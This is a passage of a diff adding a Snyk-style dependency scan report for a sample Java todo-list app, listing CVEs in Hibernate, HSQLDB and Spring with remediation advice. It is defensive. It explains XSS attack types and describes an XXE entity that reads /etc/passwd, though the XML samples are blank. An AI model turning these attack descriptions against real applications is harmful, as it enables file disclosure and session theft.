"fullDescription": { + "text": "(CVE-2019-14900) org.hibernate:hibernate-core@4.3.7.Final" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.hibernate:hibernate-core\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › io.github.snyk:todolist-core@0.0.1-SNAPSHOT › org.hibernate:hibernate-core@4.3.7.Final\n# Overview\n[org.hibernate:hibernate-core](https://github.com/hibernate/hibernate-orm) is a library providing Object/Relational Mapping (ORM) support to applications, libraries, and frameworks.\n\nAffected versions of this package are vulnerable to SQL Injection. A SQL injection in the implementation of the JPA Criteria API can permit unsanitized literals when a literal is used in the SELECT or GROUP BY parts of the query. This flaw could allow an attacker to access unauthorized information or possibly conduct further attacks.\n# Remediation\nUpgrade `org.hibernate:hibernate-core` to version 5.3.18.Final, 5.4.18.Final or higher.\n# References\n- [GitHub Pull Request](https://github.com/hibernate/hibernate-orm/pull/3438)\n- [Jira Ticket](https://hibernate.atlassian.net/browse/HHH-14077)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-89", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-ORGHIBERNATE-30098", + "shortDescription": { + "text": "Medium severity - JSM bypass via ReflectionHelper vulnerability in org.hibernate:hibernate-validator" + }, + "fullDescription": { + "text": "(CVE-2014-3558) org.hibernate:hibernate-validator@4.3.1.Final" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.hibernate:hibernate-validator\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › org.hibernate:hibernate-validator@4.3.1.Final\n# Overview\n[org.hibernate:hibernate-validator](https://mvnrepository.com/artifact/org.hibernate/hibernate-validator) is a Hibernate Validator Engine Relocation Artifact.\n\nAffected versions of this package are vulnerable to JSM bypass via ReflectionHelper. ReflectionHelper (`org.hibernate.validator.util.ReflectionHelper`) in Hibernate Validator 4.1.0 before 4.2.1, 4.3.x before 4.3.2, and 5.x before 5.1.2 allows attackers to bypass Java Security Manager (JSM) restrictions and execute restricted reflection calls via a crafted application.\n# Remediation\nUpgrade `org.hibernate:hibernate-validator` to version 4.3.2.Final, 5.1.2.Final or higher.\n# References\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/2c95d4ea0ef20977be249e31a4a4f4f4f71c945d)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/67fdff14831c035c25e098fe14bd86523d17f726)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/7e7131939a4361a7cad3e77ab89a8462132c561c)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/c489416f699a46859c134796b3ccfea41ef3ce52)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/c9525ca544b1281e2b7c7347e86e87c86dc1dc6e)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/e8c42b689df8c6752d635d02c6518da3fece3870)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/f97c2021a03c825abdeca1692f5be51e77e76a8f)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/fd4eaed7fb930db6a5e4c03742b4b3adcfecc90e)\n- [Jira Issue](https://hibernate.atlassian.net/browse/HV-912)\n- [Redhat Bugzilla](https://bugzilla.redhat.com/CVE-2014-3558)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-592", + "maven" + ], + "cvssv3_baseScore": 5.3, + "security-severity": "5.3" + } + }, + { + "id": "SNYK-JAVA-ORGHIBERNATE-568162", + "shortDescription": { + "text": "Medium severity - Improper Input Validation vulnerability in org.hibernate:hibernate-validator" + }, + "fullDescription": { + "text": "(CVE-2020-10693) org.hibernate:hibernate-validator@4.3.1.Final" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.hibernate:hibernate-validator\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › org.hibernate:hibernate-validator@4.3.1.Final\n# Overview\n[org.hibernate:hibernate-validator](https://mvnrepository.com/artifact/org.hibernate/hibernate-validator) is a Hibernate Validator Engine Relocation Artifact.\n\nAffected versions of this package are vulnerable to Improper Input Validation. A bug in the message interpolation processor enables invalid EL expressions to be evaluated as if they were valid. This flaw allows attackers to bypass input sanitation (escaping, stripping) controls that developers may have put in place when handling user-controlled data in error messages.\n# Remediation\nUpgrade `org.hibernate:hibernate-validator` to version 6.0.19.Final, 6.1.3.Final or higher.\n# References\n- [GitHub PR](https://github.com/hibernate/hibernate-validator/pull/1071)\n- [Jira Issue](https://hibernate.atlassian.net/browse/HV-1758)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1805501)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-20", + "maven" + ], + "cvssv3_baseScore": 5.3, + "security-severity": "5.3" + } + }, + { + "id": "SNYK-JAVA-ORGHIBERNATE-569100", + "shortDescription": { + "text": "Medium severity - Cross-site Scripting (XSS) vulnerability in org.hibernate:hibernate-validator" + }, + "fullDescription": { + "text": "(CVE-2019-10219) org.hibernate:hibernate-validator@4.3.1.Final" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.hibernate:hibernate-validator\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › org.hibernate:hibernate-validator@4.3.1.Final\n# Overview\n[org.hibernate:hibernate-validator](https://mvnrepository.com/artifact/org.hibernate/hibernate-validator) is a Hibernate Validator Engine Relocation Artifact.\n\nAffected versions of this package are vulnerable to Cross-site Scripting (XSS). The `SafeHtml` validator annotation fails to properly sanitize payloads consisting of potentially malicious code in HTML comments and instructions.\n# Details\n\nA cross-site scripting attack occurs when the attacker tricks a legitimate web-based application or site to accept a request as originating from a trusted source.\n\nThis is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.\n\nInjecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.\n\nEscaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, `<` can be coded as `<`; and `>` can be coded as `>`; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses `<` and `>` as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.\n \nThe most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware. \n\n## Types of attacks\nThere are a few methods by which XSS can be manipulated:\n\n|Type|Origin|Description|\n|--|--|--|\n|**Stored**|Server|The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.|\n|**Reflected**|Server|The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.| \n|**DOM-based**|Client|The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.|\n|**Mutated**| |The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.|\n\n## Affected environments\nThe following environments are susceptible to an XSS attack:\n\n* Web servers\n* Application servers\n* Web application environments\n\n## How to prevent\nThis section describes the top best practices designed to specifically protect your code: \n\n* Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches. \n* Convert special characters such as `?`, `&`, `/`, `<`, `>` and spaces to their respective HTML or URL encoded equivalents. \n* Give users the option to disable client-side scripts.\n* Redirect invalid requests.\n* Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.\n* Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.\n* Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.\n\n# Remediation\nUpgrade `org.hibernate:hibernate-validator` to version 6.0.18.Final, 6.1.0.Final or higher.\n# References\n- [Apache Security Advisory](https://lists.apache.org/thread.html/r87b7e2d22982b4ca9f88f5f4f22a19b394d2662415b233582ed22ebf@%3Cnotifications.accumulo.apache.org%3E)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/124b7dd6d9a4ad24d4d49f74701f05a13e56ceee)\n- [Hibernator Security Release Blog](https://in.relation.to/2019/11/20/hibernate-validator-610-6018-released/)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-10219)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-79", + "maven" + ], + "cvssv3_baseScore": 6.5, + "security-severity": "6.5" + } + }, + { + "id": "SNYK-JAVA-ORGHSQLDB-3040860", + "shortDescription": { + "text": "High severity - Remote Code Execution (RCE) vulnerability in org.hsqldb:hsqldb" + }, + "fullDescription": { + "text": "(CVE-2022-41853) org.hsqldb:hsqldb@2.3.2" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.hsqldb:hsqldb\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › io.github.snyk:todolist-core@0.0.1-SNAPSHOT › org.hsqldb:hsqldb@2.3.2\n# Overview\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE) when using `java.sql.Statement` or `java.sql.PreparedStatement` to process untrusted input. By default, it is allowed to call any static method of any Java class in the classpath resulting in code execution.\n\n# Workaround\nUsers who are unable to upgrade to the fixed version can set the system property `hsqldb.method_class_names` to classes which are allowed to be called. For example, `System.setProperty(\"hsqldb.method_class_names\", \"abc\")` or Java argument `-Dhsqldb.method_class_names=\"abc\"` can be used.\n# Remediation\nUpgrade `org.hsqldb:hsqldb` to version 2.7.1 or higher.\n# References\n- [Chromium Bugs](https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50212#c7)\n- [GitHub Commit](https://github.com/ryenus/hsqldb/commit/b6719c67b41eb9298c2451ad2829bf03b262a941)\n- [Mitigation](http://hsqldb.org/doc/2.0/guide/sqlroutines-chapt.html#src_jrt_access_control)\n- [SVN Commit](https://sourceforge.net/p/hsqldb/svn/6614/tree//base/trunk/src/org/hsqldb/persist/HsqlDatabaseProperties.java)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-94", + "maven" + ], + "cvssv3_baseScore": 8, + "security-severity": "8" + } + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-1009832", + "shortDescription": { + "text": "High severity - Improper Input Validation vulnerability in org.springframework:spring-web" + }, + "fullDescription": { + "text": "(CVE-2020-5421) org.springframework:spring-web@3.2.6.RELEASE" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.springframework:spring-web\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT and org.springframework:spring-web@3.2.6.RELEASE\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.springframework:spring-web@3.2.6.RELEASE\n# Overview\n[org.springframework:spring-web](https://github.com/spring-projects/spring-framework) is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.\n\nAffected versions of this package are vulnerable to Improper Input Validation. The protections against Reflected File Download attacks from CVE-2015-5211 may be bypassed depending on the browser used through the use of a `jsessionid` path parameter.\n# Remediation\nUpgrade `org.springframework:spring-web` to version 4.3.29.RELEASE, 5.0.19.RELEASE, 5.1.18.RELEASE, 5.2.9.RELEASE or higher.\n# References\n- [CVE-2015-5211](https://tanzu.vmware.com/security/cve-2015-5211)\n- [Pivotal Security Advisory](https://pivotal.io/security/cve-2020-5421)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-20", + "maven" + ], + "cvssv3_baseScore": 8.6, + "security-severity": "8.6" + } + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-30163", + "shortDescription": { + "text": "High severity - XML External Entity (XXE) Injection vulnerability in org.springframework:spring-web" + }, + "fullDescription": { + "text": "(CVE-2014-0225) org.springframework:spring-web@3.2.6.RELEASE" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.springframework:spring-web\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT and org.springframework:spring-web@3.2.6.RELEASE\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.springframework:spring-web@3.2.6.RELEASE\n# Overview\n[org.springframework:spring-web](https://github.com/spring-projects/spring-framework) is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection. This is due to not disabling the resolution of URI references by default in a DTD declaration. This occurs only when processing user provided XML documents.\n\n# Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n# Remediation\nUpgrade `org.springframework:spring-web` to version 3.2.9.RELEASE, 4.0.5.RELEASE or higher.\n# References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/8e096aeef55287dc829484996c9330cf755891a1)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/c6503ebbf7c9e21ff022c58706dbac5417b2b5eb)\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/16390)\n- [Pivotal Security](http://www.gopivotal.com/security/cve-2014-0225)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2014-0225)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-611", + "maven" + ], + "cvssv3_baseScore": 8.8, + "security-severity": "8.8" + } + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-30164", + "shortDescription": { + "text": "Medium severity - Denial of Service (DoS) vulnerability in org.springframework:spring-web" + }, + "fullDescription": { + "text": "(CVE-2015-3192) org.springframework:spring-web@3.2.6.RELEASE" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.springframework:spring-web\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT and org.springframework:spring-web@3.2.6.RELEASE\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.springframework:spring-web@3.2.6.RELEASE\n# Overview\n[org.springframework:spring-web](https://github.com/spring-projects/spring-framework) is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). It does not properly process inline DTD declarations when DTD is not entirely disabled, which allows remote attackers to cause a denial of service (memory consumption and out-of-memory errors) via a crafted XML file.\n\n# Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n# Remediation\nUpgrade `org.springframework:spring-web` to version 3.2.14.RELEASE, 4.1.7.RELEASE or higher.\n# References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/5a711c05ec750f069235597173084c2ee796242)\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/17727)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3192)\n- [Pivotal Security](http://pivotal.io/security/cve-2015-3192)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-119", + "maven" + ], + "cvssv3_baseScore": 5.5, + "security-severity": "5.5" + } + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-30165", + "shortDescription": { + "text": "High severity - Reflected File Download vulnerability in org.springframework:spring-web" + }, + "fullDescription": { + "text": "(CVE-2015-5211) org.springframework:spring-web@3.2.6.RELEASE" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.springframework:spring-web\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT and org.springframework:spring-web@3.2.6.RELEASE\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.springframework:spring-web@3.2.6.RELEASE\n# Overview\n\n[org.springframework:spring-web](https://github.com/spring-projects/spring-framework) package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.\n\n\nAffected versions of this package are vulnerable to Reflected File Download\nvia a crafted URL with a batch script extension, resulting in the response being downloaded rather than rendered.\n\n# Remediation\n\nUpgrade `org.springframework:spring-web` to version 3.2.15.RELEASE, 4.1.8.RELEASE, 4.2.2.RELEASE or higher.\n\n\n# References\n\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/03f547eb9868f48f44d59b56067d4ac4740672c3)\n\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/2bd1daa75ee0b8ec33608ca6ab065ef3e1815543)\n\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/a95c3d820dbc4c3ae752f1b3ee22ee860b162402)\n\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/18124)\n\n- [Oren Hafif Blog](https://www.trustwave.com/Resources/SpiderLabs-Blog/Reflected-File-Download---A-New-Web-Attack-Vector/)\n\n- [Pivotal Security](http://pivotal.io/security/cve-2015-5211)\n\n- [RedHat CVE Database](https://access.redhat.com/security/cve/cve-2015-5211)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-494", + "maven" + ], + "cvssv3_baseScore": 8.6, + "security-severity": "8.6" + } + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-31331", + "shortDescription": { + "text": "Medium severity - Cross-site Request Forgery (CSRF) vulnerability in org.springframework:spring-web" + }, + "fullDescription": { + "text": "(CVE-2014-0054) org.springframework:spring-web@3.2.6.RELEASE" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.springframework:spring-web\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT and org.springframework:spring-web@3.2.6.RELEASE\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.springframework:spring-web@3.2.6.RELEASE\n# Overview\r\n[`org.springframework:spring-web`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22spring-web%22)\r\nAffected versions of this package do not disable external entity resolution, which allows remote attackers to read arbitrary files, cause a denial of service and conduct CSRF attacks via crafted XML, aka an XML External Entity (XXE) issue. \r\n\r\n**NOTE:** this vulnerability exists because of an incomplete fix for [CVE-2013-4152](https://snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-31330), [CVE-2013-7315](https://snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-30162), and [CVE-2013-6429](https://snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-30160).\r\n\r\n# References\r\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0054)" + }, + "properties": { + "tags": [ + "security", + "CWE-352", + "maven" + ], + "cvssv3_baseScore": 6.3, + "security-severity": "6.3" + } + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-6261586", + "shortDescription": { + "text": "High severity - Open Redirect vulnerability in org.springframework:spring-web" + }, + "fullDescription": { + "text": "(CVE-2024-22243) org.springframework:spring-web@3.2.6.RELEASE" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.springframework:spring-web\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT and org.springframework:spring-web@3.2.6.RELEASE\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.springframework:spring-web@3.2.6.RELEASE\n# Overview\n[org.springframework:spring-web](https://github.com/spring-projects/spring-framework) is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.\n\nAffected versions of this package are vulnerable to Open Redirect when `UriComponentsBuilder` parses an externally provided URL, and the application subsequently uses that URL. If it contains hierarchical components such as path, query, and fragment it may evade validation.\n# Remediation\nUpgrade `org.springframework:spring-web` to version 5.3.32, 6.0.17, 6.1.4 or higher.\n# References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/120ea0a51c63171e624ca55dbd7cae627d53a042)\n- [Spring Advisory](https://spring.io/security/cve-2024-22243)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-601", + "CWE-918", + "maven" + ], + "cvssv3_baseScore": 7.1, + "security-severity": "7.1" + } + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-6444790", + "shortDescription": { + "text": "High severity - Open Redirect vulnerability in org.springframework:spring-web" + }, + "fullDescription": { + "text": "(CVE-2024-22259) org.springframework:spring-web@3.2.6.RELEASE" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.springframework:spring-web\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT and org.springframework:spring-web@3.2.6.RELEASE\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.springframework:spring-web@3.2.6.RELEASE\n# Overview\n[org.springframework:spring-web](https://github.com/spring-projects/spring-framework) is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.\n\nAffected versions of this package are vulnerable to Open Redirect when using `UriComponentsBuilder` to parse an externally provided `URL` and perform validation checks on the host of the parsed URL. \r\n\r\n**Note:**\r\nThis is the same as [CVE-2024-22243](https://security.snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-6261586), but with different input.\n# Remediation\nUpgrade `org.springframework:spring-web` to version 5.3.33, 6.0.18, 6.1.5 or higher.\n# References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/1d2b55e670bcdaa19086f6af9a5cec31dd0390f0)\n- [Spring Advisory](https://spring.io/security/cve-2024-22259)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-601", + "maven" + ], + "cvssv3_baseScore": 7.1, + "security-severity": "7.1" + } + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-6597980", + "shortDescription": { + "text": "Medium severity - Open Redirect vulnerability in org.springframework:spring-web" + }, + "fullDescription": { + "text": "(CVE-2024-22262) org.springframework:spring-web@3.2.6.RELEASE" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.springframework:spring-web\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT and org.springframework:spring-web@3.2.6.RELEASE\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.springframework:spring-web@3.2.6.RELEASE\n# Overview\n[org.springframework:spring-web](https://github.com/spring-projects/spring-framework) is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.\n\nAffected versions of this package are vulnerable to Open Redirect when `UriComponentsBuilder` is used to parse an externally provided URL and perform validation checks on the host of the parsed URL. \n\n**Note:**\nThis is the same as [CVE-2024-22259](https://security.snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-6444790) and [CVE-2024-22243](https://security.snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-6261586), but with different input.\n# Remediation\nUpgrade `org.springframework:spring-web` to version 5.3.34, 6.0.19, 6.1.6 or higher.\n# References\n- [Spring Advisory](https://spring.io/security/cve-2024-22262)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-601", + "maven" + ], + "cvssv3_baseScore": 5.4, + "security-severity": "5.4" + } + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2329097", + "shortDescription": { + "text": "Medium severity - Improper Output Neutralization for Logs vulnerability in org.springframework:spring-core" + }, + "fullDescription": { + "text": "(CVE-2021-22096) org.springframework:spring-core@3.2.6.RELEASE" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.springframework:spring-core\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, org.springframework:spring-web@3.2.6.RELEASE and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.springframework:spring-web@3.2.6.RELEASE › org.springframework:spring-core@3.2.6.RELEASE\n# Overview\n[org.springframework:spring-core](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22spring-core%22) is a core package within the spring-framework that contains multiple classes and utilities.\n\nAffected versions of this package are vulnerable to Improper Output Neutralization for Logs when a user provides malicious input, causing insertion of additional log entries.\n# Remediation\nUpgrade `org.springframework:spring-core` to version 5.3.12, 5.2.18 or higher.\n# References\n- [Github Commit](https://github.com/spring-projects/spring-framework/commit/346b75580267dc5d8d257be198d5841ce4e1add5)\n- [Pivotal Security Advisory](https://pivotal.io/security/cve-2021-22096)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-20", + "maven" + ], + "cvssv3_baseScore": 4.3, + "security-severity": "4.3" + } + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2330878", + "shortDescription": { + "text": "Medium severity - Improper Input Validation vulnerability in org.springframework:spring-core" + }, + "fullDescription": { + "text": "(CVE-2021-22060) org.springframework:spring-core@3.2.6.RELEASE" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.springframework:spring-core\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, org.springframework:spring-web@3.2.6.RELEASE and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.springframework:spring-web@3.2.6.RELEASE › org.springframework:spring-core@3.2.6.RELEASE\n# Overview\n[org.springframework:spring-core](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22spring-core%22) is a core package within the spring-framework that contains multiple classes and utilities.\n\nAffected versions of this package are vulnerable to Improper Input Validation when a user provides malicious input, causing insertion of additional log entries.\n# Remediation\nUpgrade `org.springframework:spring-core` to version 5.2.19.RELEASE, 5.3.14 or higher.\n# References\n- [Pivotal Security Advisory](https://pivotal.io/security/cve-2021-22060)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-20", + "maven" + ], + "cvssv3_baseScore": 4.3, + "security-severity": "4.3" + } + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-31325", + "shortDescription": { + "text": "Medium severity - Directory Traversal vulnerability in org.springframework:spring-core" + }, + "fullDescription": { + "text": "(CVE-2014-3578) org.springframework:spring-core@3.2.6.RELEASE" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.springframework:spring-core\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, org.springframework:spring-web@3.2.6.RELEASE and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.springframework:spring-web@3.2.6.RELEASE › org.springframework:spring-core@3.2.6.RELEASE\n# Overview\n[org.springframework:spring-core](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22spring-core%22) is a core package within the spring-framework that contains multiple classes and 